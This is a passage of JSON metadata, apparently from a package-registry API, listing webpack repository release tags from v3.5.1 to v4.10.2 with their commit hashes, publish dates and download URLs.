g:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%